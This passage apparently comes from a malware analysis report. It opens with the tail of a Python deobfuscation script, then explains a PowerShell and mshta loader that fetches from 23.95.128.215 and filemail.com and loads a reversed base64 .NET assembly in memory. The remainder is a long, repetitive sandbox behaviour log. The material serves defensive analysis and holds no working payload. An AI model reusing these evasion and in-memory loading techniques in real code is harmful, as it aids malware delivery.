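    clean, via = deobfuscate(STAGE2)
    print(f"piped into: {via}\n{clean}\n")
    for key, value in extract_indicators(clean).items():
        print(f"{key}: {value}")
```

Reversing the first VAI argument yields an http:// URL on 23.95.128.215, which is the fetch to hunt for in proxy logs alongside the filemail.com download; the `<<BASE64_START>>`/`<<BASE64_END>>` markers show the filemail blob is a text wrapper with a reversed base64 .NET assembly inside, which `[System.Reflection.Assembly]::Load` maps in memory without touching disk. The same `[Char]` resolver covers the `[Char]58+[cHAr]0X3A` trick the mshta-spawned stage uses to spell `::`; that stage's base64 payload is not reproduced on this page, so it is not decoded here.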

          Hooking and other Techniques for Hiding and Protection

          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
          Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe  Process information set: NOOPENFILEERRORBOX  (5 occurrences)
          Source: C:\Windows\SysWOW64\wscript.exe  Process information set: NOOPENFILEERRORBOX  (3 occurrences)
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Process information set: NOOPENFILEERRORBOX  (85 occurrences)
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
